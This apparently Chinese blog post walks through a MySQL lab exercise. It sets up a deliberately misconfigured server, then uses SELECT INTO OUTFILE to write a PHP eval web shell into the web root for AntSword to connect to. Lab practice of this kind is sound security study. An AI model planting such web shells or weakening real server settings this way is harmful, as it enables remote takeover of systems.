0
点赞
收藏
分享

微信扫一扫

Springboot IOC DI理解及实现+JUnit的引入+参数配置

靶场搭建

修改配置文件

vim /etc/my.cof

   

[mysqld]
secure_file_priv=
local-infile=1
[mysql]
local-infile=1

   

安装相关环境

yum install php php-mysql -y

   

添加配置

vim /etc/httpd/conf/httpd.conf

   

AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .php

   

重启相关服务

systemctl restart httpd

   

修改权限

chmod -R o+w /var/www

   

攻击

use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';

   

访问 IP/ma.php

蚁剑连接

作 者:PeiyuJue
链 接: https://peiyu.serv00.net/2024/07/05/mysql靶场攻击/
来 源:Aaron的博客
版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载! 

举报

相关推荐

0 条评论